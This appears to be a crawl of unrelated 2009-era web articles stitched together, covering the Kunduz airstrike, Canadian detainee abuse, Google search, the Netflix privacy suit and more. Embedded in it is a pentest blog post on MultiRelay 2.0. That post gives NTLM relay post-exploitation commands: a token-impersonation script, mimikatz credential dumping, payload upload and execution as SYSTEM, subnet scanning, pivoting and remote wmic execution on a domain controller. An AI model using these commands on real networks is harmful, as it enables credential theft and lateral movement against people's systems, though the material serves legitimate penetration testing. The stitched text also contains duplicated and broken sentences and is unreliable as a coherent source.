" He had targeted persons , not vehicles , " the report states clearly and then criticises : " The deployment of air support to combat large gatherings of people in the absence of any direct threat for one�s own forces is not compatible with the intentions and instructions of the ISAF commander . "
Jung�s successor as defence minister , Karl - Theodor zu Guttenberg ( Christian Social Union ) , based himself on this report when he defended the airstrike on November 6 , one week after taking over his new post .
This means that Guttenberg was well aware that the targets of the airstrike were persons .
Nevertheless , he affirmed that the strike was " militarily appropriate " and went so far as to declare that there would have " had to have been " an air strike , even if Klein had not made the procedural errors outlined in the NATO report .
As Guttenberg recently announced , leading representatives of all the Bundestag ( German parliament ) factions were also acquainted with the ISAF report , including a version translated into German .
Despite this , the German public was not informed of the true reasons for the massacre in Kunduz .
Only three weeks later did new details emerge .
On the basis of a report issued September 9 by German military police , the Bild newspaper reported that the German army must have known at a very early stage that civilians had been killed in the attack .
Thereupon , Minister Jung , who had been appointed labour minister in the new German cabinet , resigned his post and Guttenberg sacked the German army general inspector , Wolfgang Schneiderhan , and Deputy Defence Minister Peter Wichert , claiming that the two had withheld from him the military police report and other relevant information .
Schneiderhan and Wichert deny that this was the case .
Guttenberg then " corrected " his estimation of the air strike and told the German parliament that he accepted that the attack was " militarily inappropriate . "
Nevertheless , he stood behind Colonel Klein , claiming that the latter had undoubtedly acted " according to his best knowledge and conscience . "
Addressing those members of the army sitting in the gallery and listening to the parliamentary debate , Guttenberg declared he would not " abandon " Klein .
At the end of last week , both Der Spiegel and the S�ddeutsche Zeitung published excerpts from the Klein and NATO reports , which blew large holes in the government - sponsored wall of lies .
Guttenberg was finally forced to concede that the airstrike had targeted people and that he had known this since taking office .
There were compelling reasons for the German government�s web of deception regarding the events at Kunduz .
The Kunduz massacre represents a turning point in the history of the German army and touches upon the political conception upon which it is based .
It raises fundamental legal , political and historical questions , which the government does not want to discuss publicly because it lacks any majority public support for its stance .
There is a widespread abhorrence of militarism and war in modern Germany following the horrors of the Second World War and the crimes committed by Hitler�s Wehrmacht , which was dissolved at the end of the war .
A new army , the Bundeswehr , was only established in 1955 in the face of massive public opposition and on the basis of strict parameters regarding its deployment .
It was set up as a purely defensive army subordinate to parliamentary control and subject to constant democratic legitimisation .
Until the reunification of Germany in 1990 , any deployments by the German army outside of NATO were deemed unconstitutional .
In the course of the 1990s , this ban was gradually watered down and finally dropped .
But international deployments by the German army were always depicted as " peace " missions .
The ISAF mission in Afghanistan , based on a UN mandate , is also officially defined as a security and reconstruction mission , aimed at assisting the elected government of Afghanistan by establishing a safer security environment .
Such parameters are incompatible with the dropping of bombs on a crowd and the targeted killing of opponents .
Defence Secretary Guttenberg has reacted to the collapse of his wall of lies by going on the offensive , giving a series of interviews and appearing on a number of TV talk shows last weekend .
He has categorically rejected demands for his resignation .
" I will definitely stay , even if a storm is blowing .
That is the way I have been educated �and that is the way I will behave , " the scion of an aristocratic family told the RTL television station .
In the Bild am Sonntag , he called for " more realistic rules " for the German armed forces in Afghanistan .
He wants to officially legitimise what previously took place in a legally gray area .
Guttenberg told the paper that he had repeatedly pointed out that there were " war - type conditions " in Afghanistan and that in such situations , " the use of weapons against civilians could not be ruled out . "
He added , " It is difficult for soldiers to understand why they should be confronted with criminal proceedings even though they act within rules of the given mandate . "
In response to those politicians from the Social Democratic Party and Greens who have demanded his resignation , Guttenberg countered that they too had known since November 3 that the aim of the airstrike was to eliminate alleged members of the Taliban .
The S�ddeutsche Zeitung noted that Guttenberg was " taking the reds and greens into joint liability . "
His message to the opposition was : " We are all sitting in the same boat . "
Guttenberg has also sought to intimidate his critics by threatening them with angry soldiers .
He has resorted to the well - known method of depicting opponents of the war as enemies of the soldiers who risk their lives at war .
He told the Bild am Sonntag that soldiers needed " full support from the homeland " as well as " protection and legal security . "
Last Friday , Guttenberg took the spokespersons of all the parties represented in the parliamentary defence committee for a short visit to the German field camp in Kunduz .
The official aim of the visit was to solicit the sympathy of the soldiers for the Committee of Inquiry investigating the events at Kunduz that was to be constituted on Wednesday .
According to information published by the army , Guttenberg simultaneously warned against any attempt by the Committee of Inquiry to discredit soldiers .
The media were excluded from the meeting .
This type of warning in the name of the army to a democratically elected committee smacks of military dictatorship .
In the German media , a discussion is taking place over the issue of whether the army is permitted to carry out targeted killings .
Heribert Prantl , the editor for home affairs of the S�ddeutsche Zeitung and a trained lawyer , concludes that both the deliberate targeting of opponents and the sacrifice of civilian lives as a consequence clearly violate existing law .
The legal expert of the taz newspaper , which is close to the Greens , expresses an opposite point of view .
According to Christian Rath , the ISAF mandate agreed on by the Bundestag and ISAF rules of engagement permit the deliberate killing of enemy fighters .
Germany�s own reservations over existing ISAF rules , which permit the use of deadly force only in the case of protection against an attack , had been quietly dropped by the German army last April .
The conservative FAZ newspaper is of the same opinion : " Germany finds itself in a war - like situation in Afghanistan , which means that the German army is in principle allowed to kill enemy fighters . "
Last summer , the government had changed the so - called " pocket map " summarising " the principles for the application of military force " for soldiers .
There are a number of indices that this change encouraged Colonel Klein to order the attack in Kunduz .
The Leipziger Volkszeitung quotes an anonymous source from the army high command in Potsdam who states that Colonel Klein " would have felt positively encouraged by these recent government guidelines to finally hit home hard . "
In this respect , the decision by the Federal Prosecutor�s Office , which is currently investigating Colonel Klein , will be of great importance .
Should the Prosecutor�s Office suspend its investigations or a trial end with an acquittal , this would amount to a licence to kill for the German army .
Klein arrived at his decision to kill more than a hundred people on the basis of the narrowest of criteria .
According to the information available , he based his decision on the reports by one informant in the vicinity of the trucks , who then passed on his information through two further intermediaries �an interpreter and another agent .
This informant is alleged to have assured Klein that only " Taliban " rebels were in the vicinity of the trucks .
This information �if it existed at all �was false .
It has since been established that civilians and children were among the victims .
The demarcation between " Taliban " and civilians is in any respect completely suspect .
According to Der Spiegel , which carried out investigations amongst victims of the attack , there is little to differentiate members of the Taliban from ordinary villagers .
Increasingly , it is such villagers who are in the forefront of resistance against the occupying forces .
The magazine cites the Afghan secret service agent Mohammed Daud Ibrahimi , who declares : " The people who we fight at night are brave farmers during the day , they just put their weapons in a cupboard . "
The only positive responses to the actions of the German army have come from government representatives with close relations to the corrupt regime of Hamid Karzai .
:: Article nr. 61162 sent on 17 - dec-2009 17:58 ECT
www.uruknet.info?p=61162
::
The views expressed in this article are the sole responsibility of the author and do not necessarily reflect those of this website .
The section for the comments of our readers has been closed , because of many out - of - topics .
Now you can post your own comments into our Facebook page : www.facebook.com/uruknet
Warning : include (./ share/share2.php ) : failed to open stream :
No such file or directory in /home / content/25/8427425/html/vhosts/uruknet/colonna-centrale-pagina-ansi.php on line 385
Warning : include ( ) : Failed opening './share/share2.php ' for inclusion ( include_path='.:/usr/local/php5_6/lib/php') in /home / content/25/8427425/html/vhosts/uruknet/colonna-centrale-pagina-ansi.php on line 385
[ Printable version ] | [
Send it to a friend ]
[ Contatto / Contact ] | [ Home Page ] | [ Tutte le notizie / All news ]
OTTAWA – The federal Conservative government is warning the three Opposition parties that efforts to force disclosure of classified documents on the Afghan detainee controversy are a risk to national security .
The Commons was debating a Liberal Opposition Day motion based on the supremacy of Parliament to force the government 's hand .
Meanwhile , a public hearing by a military watchdog into the handling of Afghan prisoners has been rescheduled for the spring — if it proceeds at all .
Peter Tinsley , the outgoing chairman of the Military Police Complaints Commission , said it was necessary to set a date for the resumption of the inquiry , but Conservative government has yet to appoint his successor , The Canadian Press reported .
The Liberal motion would , if passed , order the government to disclose uncensored copies of sensitive documents that are central to the question of whether Canada ignored warnings that prisoner protection arrangements were insufficient and led Canadian soldiers to hand Afghan prisoners over to Afghan authorities who subjected them to torture .
Information of when and how Canadian officials visit particular prisons , for instance , " would be of great value to the insurgents , and to the terrorists , " said Justice Minister Rob Nicholson .
" They could use this knowledge to attack our monitors and free the detainees . "
" It directly affects the lives of Canadians serving on the front lines of a deadly conflict half a world away . "
" We must not sacrifice the safety of these brave souls on the altar of parliamentary privilege , yet this is precisely what the motion before us today proposes to do , " Nicholson told the House of Commons .
Nicholson dismissed arguments led by Liberal Leader Michael Ignatieff that parliamentary privilege should prevail , and parliamentarians could be trusted to protect sensitive information .
Ignatieff called for the uncensored documents but also insisted a full public inquiry is needed to clear the air .
Nicholson ridiculed the notion that " parliamentary privilege somehow relieves public servants appearing before committee of their obligation to protect sensitive information that relates to national security , national defence or international relations . "
Nicholson said there is " well - established " parliamentary convention that committees will respect crown privilege and Crown immunity when invoked , " at least in relation to matters of national and public security . "
He appeared to concede that Parliament reigns supreme , but said in this case it would be unwise to flex its muscle .
" This House must exercise its powers responsibly , and in some cases the only responsible option is for this House and its committees from pressing the theoretical extent of its powers . "
Nicholson defended the decision to censor documents provided to the Military Police Complaints Commission , saying " no other tenable option existed " once the commission — investigating the actions of military police in detainee transfers — decided to hold public hearings .
He said that prior to that decision the government had provided thousands of uncensored documents to the commission .
" The decision to redact documents is not taken lightly and reflects the absolute need to protect sensitive information . "
Loading ...
Loading ...
Loading ...
Loading ...
Loading ...
Loading ...
NDP defence critic Jack Harris " the government has built up a wall of secrecy around this and it's unbelievable . "
Outside the House , NDP Leader Jack Layton warned that if Canada does n't call a public inquiry to probe allegations of prisoner tortured by Afghan officials then some international body will do it instead .
Layton told a press conference the Canadian government can't allow that to happen because it would sully the country 's enviable reputation for fairness and accountability .
" I 'm concerned about Canada 's reputation and I believe we should look after our own problems here , " Layton said in his year - end press conference .
The Conservative government has ignored an opposition parties ' motion calling for a public inquiry and so far calls for Defence Minister Peter MacKay 's resignation have been rebuffed as well .
" It is quite clear the government does n't want the truth to come out , " Layton said .
The calls for MacKay to step down grew louder Wednesday when Chief of Defence Staff Walter Natynczyk suddenly admitted that Canadian detainees were abused in Afghanistan , despite years of denials .
" Ultimately it has to be the minister responsible .
That our tradition in Canada .
It 's ministerial responsibility that is supposed to govern the behaviour of a cabinet .
What we 've had is a minister who has insisted there were no case .
And now there is as case .
Can we be certain there were n't other cases ? "
Layton said .
Natynczyk told reporters not only was it known
Afghan police abused prisoners but that one in particular handed over by Canadian troops was later badly beaten .
With files from The Canadian Press
December 11 , 2009 C- SPAN
( Nicole : ) Kucinich - - who makes so much sense that he would never be given the same air time as Joe Lieberman or John McCain -- also took part in a protest outside the White House this weekend :
Speakers urged Americans to take to the streets in opposition to what they called the escalation of an unnecessary war that has killed soldiers and civilians .
" The message is clear :
We have money for war but not for jobs , " said Rep. Dennis J. Kucinich ( D - Ohio ) .
" We have money for war but not for health care .
We have money for war but not for education .
. . .
We have money for war but not for peace . "
Kucinich said that he is urging his fellow lawmakers to vote against additional war funding .
It 's that time of year again -- time to look back and offer my 2009 awards for the most malicious , obnoxious , offensive , or nonsensical behavior in technology .
The 10 winners this year include some of the best - known companies on the planet , as well as some obscure but worthy candidates .
This year 's Moonie awards come with a special commemorative statuette depicting Steve Ballmer and Carol Bartz making the search engine with two backs .
[ See which products make Cringely 's list of " The biggest tech turkeys of 2009 . " |
And stay up to date on all Robert X. Cringely 's musings and observations with InfoWorld 's Notes from the Underground newsletter . ]
Without further ado , here are the 2009 winners .
I can't imagine a more deserving bunch .
1 . War is peace , freedom is slavery , ignorance is strength award : Goes to Jeff Bezos and the crew at Amazon , after they reached out and deleted copies of " 1984 " and " Animal Farm " from customers ' Kindles .
Apparently , they also deleted the entry for “ irony ” from the Kindle 's built - in dictionary .
2 . The " I 'm not a laywer , I just play one on TV " award : Goes to Charles Nesson , a Harvard Law professor who advised his client , admitted file swapper Joel Tenenbaum , to admit he swapped files on the stand -- whereupon the judge declared him guilty , ultimately costing Joel $ 675,000 in damages .
We really liked the bit where Nesson crumbled up styrofoam to show how MP3 files get broken into bits and distributed across the Net .
We hear he'd have used paper and scissors , only he 's not allowed to handle sharp instruments .
3 . Surest sign the apocalypse is upon us ( No. 27 in a series ) award : Goes to Hollywood production companies Revielle and Brillstein Entertainment , which came up with an idea for a reality TV series based on Twitter .
Because this is apparently what reality TV really needs : updates about people 's cats .
4 . Best use of vomit as a promotional tool award : Goes to Microsoft , for its ever - so - charming TV ad for Internet Explorer 8 's
InPrivate browsing feature , in which a woman accidentally sees what sites her husband has been visiting and immediately begins projectile vomiting all over the kitchen .
Interestingly , that 's also how most Microsoft products make me feel .
5. Epic failures in punctuation award :
Is a tie between the country of Sweden and Google .
Back in October , Sweden 's 9 million residents were booted off the Net when a piece of DNS - updating software left out a period before the country 's domain name ( .se ) , causing all sites using that domain to go dark for about 90 minutes .
Similarly , for about 40 minutes last Jan. 31 , anyone clicking on any Google search result got a “ Warning !
This site might harm your computer ” message .
The culprit ?
Some employee updating Google 's StopBadware database accidentally added the URL “ / ” to the list of dangerous sites -- which in IP - speak means “ all sites . ”
In other words , a single slash can bring the Net to its knees .
See , your English teacher always told you punctuation was important .
MOUNTAIN VIEW , California – Google said Monday it will begin indexing much of the web in real time , and marry those results with its relevance - ranking technology to make sense of the torrents of information being published via Twitter , Facebook and blogs .
The announcement , at a news conference at the Computer History Museum here , signals an aggressive push by Google to maintain its mantle as search - innovation leader amid unaccustomed pressure from rivals .
Microsoft effectively beat Google to the real - time punch , announcing Facebook and Twitter partnerships for its Bing search engine at the Web 2.0 Summit in October .
" Google Real Time search is Google 's relevance technology meeting the real - time web , " said Google Fellow Amit Singhal .
" There is so much information being generated that relevance is the key to any product , and that 's where Google comes in . "
Monday 's announcement aims to address a major perceived shortcoming in Google 's technology , which has drawn criticism lately for not keeping up with the flood of short status updates on social networks , which some see as creating a new information revolution defined by instantaneous , or " real time , " distribution of information .
Google 's results page will now include a scrolling box of links that update constantly even as you scan through the other results .
Clicking through takes one to a page of real - time scrolling updates .
This feature is now available on iPhones and Android , Singhal said .
The update will be rolled out progressively over the next two days .
If you do n't see it yet in your search results , you can try it here .
In addition to including Facebook and Twitter in its stream , Google said it 's the first search company to partner with MySpace for real - time search .
Google said its real - time search offers not just a stream of data , but an organized stream filtered of spam and other irrelevant information .
The key to keeping the updates relevant is that Google judges " author quality , " " probability of relevance " and " query hotness , " according to Singhal .
" That 's what real - time search is all about , " he said .
In what seemed an almost - defensive move in light of recent press given to Bing and Yahoo search , Google 's VP for search Marissa Mayer started the event by telling reporters that Google is constantly innovating , and that it launched " 33 different search innovations in 67 days , " a list that ranged from Google 's cool new music search to holiday logos .
Microsoft's Bing and Yahoo's search team have been pushing the idea for more than a year that search is more than just about the best links , and that what people really want are answers , not links .
That 's a none - too - subtle dig at Google 's paradigm - changing search innovation – PageRank – that actually made links useful .
Google , which still commands 70 percent of the U.S. search market , has been slow to change its simple interface , but Mayer made it clear Monday that Google understands that there are many ways to return information to searchers , including answers that are personalized – a nod to a little - noticed announcement last Friday that Google would personalize all results , using cookies in a browser – even for those who do n't have Google accounts .
" Our search results have to mirror the [ internet 's ] richness , " Mayer said .
" It 's not just about 10 blue links .
It 's about the best answers .
" We do n't know what search will look like 30 years from now , but what we do know is that they will be more personalized , " Mayer said .
Mayer was followed on stage by Vic Gundotra who quickly demoed how good Google 's search by voice on mobile phones has gotten .
He spoke , " Pictures of Barack Obama with the French president at the G8 summit , " into his phone , which then returned exactly those results in seconds .
Gundotra then demoed how voice works in Mandarin , and announced that it would now work with Japanese as well .
Gundotra said the future of search on phones involves search using microphones as the ears , the camera as eyes , the GPS chip as the location , and the speaker as a voice .
Gundotra also showed off a demo of an automatic translator that lets you speak English into your phone and then have it translated into Spanish which is then spoken .
For instance , Gundotra said , " My name is Dick .
Please show me to the nearest hospital . "
In seconds a woman 's voice said this in perfect Spanish .
The app is expected to be released in 2010 in many languages , Gundotra said .
Google also showed off customized Google Suggest that uses location .
For instance , starting a query " RE " in Boston suggest the Red Sox , while the same start of query in San Francisco suggests the outdoor store REI , one of the city 's most popular retailers .
Google Local has a button called " Near Me Now " right now that lets you see the surrounding local businesses — and their online ratings .
That same feature is now available in a new version of Google Maps for Android , which sends your latitude and longitude from your phone to Google and returns a list of what 's nearby and good .
Finally , Google Goggles lets you take a picture using your phone and send it to your phone , which scans it for text and searches for it .
It can also take a picture of a famous landmark such as the Itsukushima Shrine and actually tell you what it is , and show you pages about it .
You can try this out by dipping into Google Labs , if you have an Android phone .
See Also :
Brittany Murphy was born Brittany Anne Bertolotti on November 10 , 1977 in Atlanta , Georgia , to Sharon Kathleen Murphy and Angelo Joseph Bertolotti .
Her father 's ancestry is Italian , and her mother is of Irish and Slovak descent .
Her father moved the family back to Edison , New Jersey as a native New Yorker and to be closer to other siblings from ...
Introduction :
If you have n't read the initial MultiRelay introduction post , I strongly invite you to read it .
MultiRelay Description :
MultiRelay 2.0 is a powerful - professional grade - pentest utility included in Responder 's tools folder , giving you the ability to perform targeted NTLMv1 and NTLM v2 relay and post exploitation on a selected target .
New Functionalities :
Several new functionalities were added to the MultiRelay shell interface , those are listed below :
Upload a file on the target :
Using the " upload " command , a user can push any file using the SMB protocol on the compromised target .
The file will be uploaded in c : \Windows \Temp\
Delete a file on the target :
Using the " delete " command , a user can delete any file using the SMB protocol on the compromised target .
If the file has been successfully deleted , no errors will be shown .
Run a command as the currently logged in user :
Using the " runas " command , a user will be able to launch a service which will run a command as the currently logged in user .
Pivot to another host , using the currently logged in user 's sets of credentials .
Using the " pivot " command , a user will attempt to propagate to another host ( Lateral movement ) .
Run remote Mimikatz ( 32 - bit , 64 - bit ) RPC commands :
Using the " mimi " or " mimi32 " command , the user will be able to interact with mimikatz RPC on the target .
Scan the current / 24 or / 16 in order to find other hosts to pivot to :
When using the " scan / 24 " command , a user will be able to scan the entire class C and chose another host to pivot to .
Run a local command on the local system :
Any other command will launch a service which will run a command as LocalSystem .
Since the previous version 2 new options were added :
-c Run a command as system then exit ( scripting ) .
-d Dump the SAM database then exit ( scripting ) .
Good Things To Know :
All binaries used by MultiRelay are stored in ./tools/MultiRelay / bin/
Filenames for these binaries are specified in MultiRelay.py , starting at line 48 :
MimikatzFilename = " ./MultiRelay/bin/mimikatz.exe "
Mimikatzx86 Filename = " ./MultiRelay/bin/mimikatz_x86.exe "
RunAsFileName = " ./MultiRelay / bin/Runas.exe "
SysSVCFileName = " ./MultiRelay / bin/Syssvc.exe "
Any binaries can be replaced with your own , simply make sure to change the name accordingly in MultiRelay .py .
The upload local path is ./ tools / .
If you put your payloads in ./tools / MultiRelay / , you 'll have to run : upload MultiRelay/custompayload.exe .
Best is to provide the full path .
If you have some sets of credentials , you can use MultiRelay without relaying an NTLM hash .
On one screen point MultiRelay to your target and on another one run : smbclient - U user % password - W domain //Your_IP / c $
Think about the command you 're about to launch before launching it .
Uploading your custom version of mimikatz and running " mimikatz " will keep the process hanging and you wont be able to delete the file unless you 're using taskkill /F / IM file .exe .
For custom mimikatz command usage with MultiRelay , please refer to the MultiRelay 2.0 Wushu section .
NTLM Relay Lateral Movement :
Getting command execution via NTLM Relay is commonly achieved via SVCCTL :
Open IPC $ named pipe \ SVCCTL -> create a service with your command -> start the service -> get the output -> done .
While running commands as SYSTEM is cool , you can't do much on the network with this user , meaning that you cannot access other network resources with a local system account .
This limits the compromise to only one host at the time , and you might wait a long time before another administrator hash flies over the wire ...
While building MultiRelay 1.0 , I thought it would be nice to execute commands as the currently logged in user in the next version and have the ability to pivot across the network .
When I started to work on MultiRelay 2.0 I made a 5 lines python script ( Runas.py ) which impersonate a logged in user :
import sys , win32ts , win32 process , win32con
SessionID = win32ts.WTSGetActiveConsoleSessionId ( )
UserToken = win32ts.WTSQueryUserToken( SessionID )
h , tn , pi, ti = win32process .CreateProcessAsUser( UserToken , " c:\\Windows\\system32\\cmd.exe " , " / c " +' '.join(sys.argv[ 1 : ] ) , None , None , True , win32con.
NORMAL_PRIORITY_CLASS , None , None , win32 process .
STARTUPINFO ( ) )
WTSGetActiveConsoleSession
Id " Retrieves the session identifier of the console session .
The console session is the session that is currently attached to the physical console .
Note that it is not necessary that Remote Desktop Services be running for this function to succeed " .
Once we have the session ID , we use the
As stated in WTSGetActiveConsoleSession
Id MSDN documentation WTSGetActiveConsoleSession
Id " Retrieves the session identifier of the console session .
The console session is the session that is currently attached to the physical console .
Note that " .
Once we have the session ID , we use the WTSQuery UserToken function to retrieve the Token associated with the previously acquired Session ID , and call CreateProcess AsUser with our command .
In short , we 're able to impersonate any logged in user and re-use their credentials and resource access across the network .
This opens a whole new kind NTLM Relay attack vector : Propagation and mass compromises resulting from 1 relayed authentication .
Teaming up with @gentilkiwi :
@gentilkiwi developed a custom mimikatz RPC server , added more token impersonation options , the ability to run mimikatz as a service and he also took care of bringing Runas .
exe to a decent size of 9 k while I was working on Mimikatz RPC client and all the other MultiRelay functionalities .
Earlier versions of MultiRelay used this python script compiled with pyinstaller which generated a pretty big file from a 5 python lines script ... @gentilkiwi jumped in and said " I think I can do way better " , and he did.@gentilkiwi developed a custom mimikatz RPC server , added more token impersonation options , the ability to run mimikatz as a service and he also took care of bringing Runas .
exe to a decent size of 9 k while I was working on Mimikatz RPC client and all the other MultiRelay functionalities .
These new Mimikatz functionalities allows MultiRelay to interact stealthily with Mimikatz and use without restriction all of the power this awesome tool gives us .
MultiRelay 2.0 Wushu :
Below are listed some post exploitation attack examples :
Mimikatz RPC :
Get all available token , impersonate one user and run a command as this user :
C:\Windows\system32\:#mimi token :: list C:\Windows\system32\:#mimi token ::run /user: User_To_Impersonate / process:Command_To_Run C:\Windows\system32\:#mimi token ::run /user : Administrator / process : whoami
Get all logon passwords :
mimi sekurlsa:: logonpasswords
Etc , all regular mimikatz commands are available on the RPC interface
Get all available token , impersonate one user and run a command as this user :
Get all logon passwords : Etc , all regular mimikatz commands are available on the RPC interface Upload your custom mimikatz or payload and run it :
Upload an executable and launch it from Windows / Temp / as system .
C:\Windows\system32\:#upload path/to/mimikatz.exe C:\Windows\system32\:#%windir%\Temp\mimikatz.exe " sekurlsa::logonpasswords " exit
The exit command is very important with mimikatz , if you do n't use it mimikatz will stay loaded and the command will fail .
Note :
If you need to run your executable as the currently logged in user , use : C: \Windows\system32\:#runas %windir%\Temp\Filename.exe args
Now delete the file :
C:\Windows\system32\:#delete / Windows/Temp/mimikatz.exe
Upload an executable and launch it from Windows / Temp / as system .
with mimikatz , if you do n't use it mimikatz will stay loaded and .
Note :
If you need to run your executable as the currently logged in user , use : Now delete the file : Scan the current class C and pivot to another host :
C:\Windows\system32\:#scan /24 ...[ snip ] ...
[ '192.168.1.141 ' , Os : ' Windows Server 2016 Standard 14393 ' , Domain : ' SMB3 ' , Signing : ' True ' ]
[ '192.168.1.142 ' , Os : ' Windows Server 2012 R2 Datacenter 9600 ' , Domain : ' SMB3 ' , Signing : ' False ' ]
[ '192.168.1.144 ' , Os :' Windows 5.1 ' , Domain : ' SMB3 ' , Signing : ' False ' ]
[ '192.168.1.145 ' , Os : ' Windows Server 2012 R2 Datacenter 9600 ' , Domain : ' SMB3 ' , Signing : ' False ' ]
...[ snip ] ...
C:\Windows\system32\:#pivot 192.168.1.145
[+]
Pivoting to 192.168.1.145 .
Connected to 192.168.1.145 as LocalSystem .
Run a command as the currently logged in user :
C:\Windows\system32\:#runas whoami smb3\lgandx
Execute commands on the PDC remotely and read the output :
Mount the PDC C:\ drive : C:\Windows\system32\:#runas net use g : \\smb3.local\c$
The command completed successfully .
C:\Windows\system32\:#runas wmic /node:smb3.local process call create " cmd / c whoami^>c:\results.txt "
Executing ( Win32_Process ) -> Create ( )
Method execution successful .
Out Parameters :
instance of __PARAMETERS
{
ProcessId = 1068 ;
ReturnValue = 0 ;
} ; Note :
When using special DOS characters with wmic , they need to be escaped with a ^ .
Example : whoami^>c:\results.txt C:\Windows\system32\:#runas more g:\results.txt
smb3\lgandx
These are just a few examples of what MultiRelay allows you to accomplish on a Windows active directory environment , for the rest it 's up to your imagination .
These are just a few examples of what MultiRelay allows you to accomplish on a Windows active directory environment , for the rest it 's up to your imagination .
Final Words :
The donation campaign
Black Hills Information Security : http://www.blackhillsinfosec.com/
I work as an independent contractor / pentester and I get pretty busy these days .
When I work on Responder , I end up working for free for the community and losing money I could make with my contracts , especially when a set of new functionalities or research takes up to a month , full time .
Therefore a donation campaign was launched a few month ago in order to get some funding for this project , and I think it was a success .
More than 50 pentesters around the world and 3 companies donated to this project , therefore supporting the development of this set of free tools used in your everyday internal pentests .
I would like to thank all the independent penetration testers who donated and these 3 companies :
And all , ALL the pentesters around the world who donated to this project .
Obama 's Cybersecurity Czar
Rumors are that RSA president Art Coviello declined the job .
No surprise : it has no actual authority but a lot of responsibility .
Security experts have pointed out that previous cybersecurity positions , cybersecurity czars and directors at the Department of Homeland Security , have been unable to make any significant changes to lock down federal systems .
Virtually nothing can get done without some kind of budgetary authority , security expert Bruce Schneier has said about the vacant position .
An advisor can set priorities and try to carry them out , but wo n’t have the clout to force government agencies to make changes and adhere to policies .
For the record , I was never approached .
But I would certainly decline ; this is a political job , and someone political needs to fill it .
I ’ve written about this before — also , the last paragraph here :
And if you ’re going to appoint a cybersecurity czar , you have to give him actual budgetary authority — otherwise he wo n’t be able to get anything done , either .
Maybe we should do a reality TV show : “ America ’s Next Cybersecurity Czar . ”
EDITED TO ADD ( 12/12 ) : Commentary .
Posted on December 11 , 2009 at 6:37 AM • 27 Comments
Watch the final installment of our weekly webinar series , which was on The Future of Retail
Co hosted with the School of Business , this webinar features Jonathan Reynolds , Devon Hughes , Sinead Roden , and Laurent Muzellec .
On Sunday , Senator Joe Lieberman infuriated Democrats by announcing that he would vote against the latest compromise health care legislation , despite the fact that during the delicate crafting of the compromise he had told them he would support it .
His stated reason ?
The compromise would allow people starting at age 55 to purchase health insurance from Medicare , which Lieberman said he could not support .
But a video turned up of Lieberman not only endorsing expanding Medicare to people over the age of 50 , but trying to take credit for it as his own idea : “ What I was proposing was that they have an option to buy into Medicare early . ”
When confronted with the video , taken only three months ago , Lieberman replied that he did not dispute that he once supported the idea but said he did not recall having done so , or the context , until Mr. Reid ’s office confronted him about it .
So why did Lieberman do such a complete flip - flop ?
According to the NY Times :
Mr. Lieberman could not be happier .
He is right where he wants to be — at the center of the political aisle , the center of the Democrats ’ efforts to win 60 votes for their sweeping health care legislation .
For the moment , he is at the center of everything — and he loves it .
Indeed , in an interview yesterday , Lieberman flashed a broad grin , saying “ My wife said to me , ‘ Why do you always end up being the point person here ? ’”
It is worth noting that his wife is a former pharmaceutical company executive .
And during his 2006 Senate reelection campaign , Lieberman received the second highest amount of campaign contributions from the health insurance industry in the Senate .
An in - the - closet lesbian mother is suing Netflix for privacy invasion , alleging the movie rental company made it possible for her to be outed when it disclosed insufficiently anonymous information about nearly half - a- million customers as part of its $ 1 million contest to improve its recommendation system .
The suit known as Doe v. Netflix ( .pdf ) was filed in federal court in California on Thursday , alleging that Netflix violated fair - trade laws and a federal privacy law protecting video rental records , when it launched its popular contest in September 2006 .
The suit seeks more than $ 2,500 in damages for each of more than 2 million Netflix customers .
In order to get a better movie recommendation algorithm , the online DVD rental company gave more than 50,000 Netflix Prize contestants two massive datasets .
The first included 100 million movie ratings , along with the date of the rating , a unique ID number for the subscriber , and the movie info .
Based on this data from 480,000 customers , contestants had to come up with a recommendation algorithm that could predict 10 percent better than Netflix how those same subscribers rated other movies .
But video records count among the most privacy protected records in the U.S. – a reaction to a reporter getting Supreme Court–nominee Robert Bork 's records from a video store .
The lead attorney on the new suit , Joseph Malley , recently reached a multimillion - dollar settlement with Facebook over its failed Beacon program , which drew fire in part for sharing users '
Blockbuster rentals with their friends .
Thursday 's suit argues that the information is personal data protected by Netflix 's privacy policy , and that NetFlix should have known that people would be able to identify users based on that data alone .
In fact , just two months before NetFlix launched the contest , AOL released " anonymized " search - engine logs , which reporters quickly used to track down real people .
So it was n't surprising that just weeks after the contest began , two University of Texas researchers – Arvind Narayanan and Vitaly Shmatikov – identified several NetFlix users by comparing their " anonymous " reviews in the Netflix data to ones posted on the Internet Movie Database website .
Revelations included identifying their political leanings and sexual orientation .
The complaint calls that the Brokeback Mountain factor , arguing that marketers will suck up the data , combine it with other data sets and start pigeon - holing people into marketing categories , based on assumptions about the movies they rated .
[ M]ovie and rating data contains information of a more highly personal and sensitive nature .
The member ’s movie data exposes a Netflix member 's personal interest and / or struggles with various highly personal issues , including sexuality , mental illness , recovery from alcoholism , and victimization from incest , physical abuse , domestic violence , adultery , and rape .
The Plaintiffs ’ and class members ’ movie data and ratings , which were released without authorization or consent , have now become a permanent , public record on the Internet , free to be manipulated and exposed at the whim of those who have the Database .
That 's why the lesbian mom joined the lawsuit as a Jane Doe , according to the complaint , since she believes that " were her sexual orientation public knowledge , it would negatively affect her ability to pursue her livelihood and support her family and would hinder her and her children 's ability to live peaceful lives . "
The contest ended this summer when two different teams passed the 10 percent improvement mark , with the prize money going to a team led by AT&T researchers .
The suit is also asking the court to stop Netflix from launching its promised second contest to improve the recommendations – this time giving out user data that includes ZIP codes , ages and gender , along with movie ratings and ID numbers substituted for user names .
That 's a foolish idea on Netflix 's part , according to University of Colorado law professor Paul Ohm , who in a blog post in September called the idea " a privacy blunder that could cost millions of dollars in fines and civil damages . "
Ohm , a former Justice Department lawyer , recently authored a legal paper calling into question the practice of anonymizing data , essentially finding that if data is useful to researchers , it could also , by definition , be re-identified .
For instance , if a data set reveals a person 's ZIP code , birthdate and gender , there 's an 87 percent chance that the person can be uniquely identified .
Ohm did not however support a lawsuit against Netflix for the original contest , arguing the company made good faith efforts to hide identities , using a data - obfuscation technique called perturbation .
A Netflix spokesman said the company could not comment since it had not yet seen the suit .
Photo : Still from the 2005 film Brokeback Mountain , courtesy Paramount Pictures .
See Also :
A Beaverton Army captain who stole nearly $ 700,000 in government cash intended for humanitarian relief , reconstruction programs and security contracts in Iraq , pleaded guilty today to theft charges .
Capt .
Michael D. Nguyen , a 28 - year - old West Point graduate based out of Fort Lewis , Wash . , acknowledged that he stole government property and illegally structured financial transactions .
Both charges carry penalties of up to 10 years in prison and a $ 500,000 fine .
He is scheduled for sentencing on March 1 in Portland 's U.S. District Court .
